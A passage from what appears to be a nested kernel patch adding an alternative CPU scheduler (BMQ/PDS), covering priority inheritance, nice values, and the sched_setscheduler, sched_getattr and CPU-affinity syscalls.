++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	update_rq_clock(rq);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is loads of tricky to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a nono in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task is
++	 * not SCHED_NORMAL/SCHED_BATCH:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy         return value   kernel prio    user prio/nice
++ *
++ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
++ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * allow normal nice value to be set, but will not have any
++	 * effect on scheduling until the task not SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * IF use task_access_lock() here:
++	 * For the task p which is not running, reading rq->stop is
++	 * racy but acceptable as ->stop doesn't change much.
++	 * An enhancemnet can be made to read rq->stop saftly.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads its a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboost
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ *
++ * Return: 0 on success. An error code otherwise.
++ * @param: structure containing the new RT priority.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++#ifdef CONFIG_SMP
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
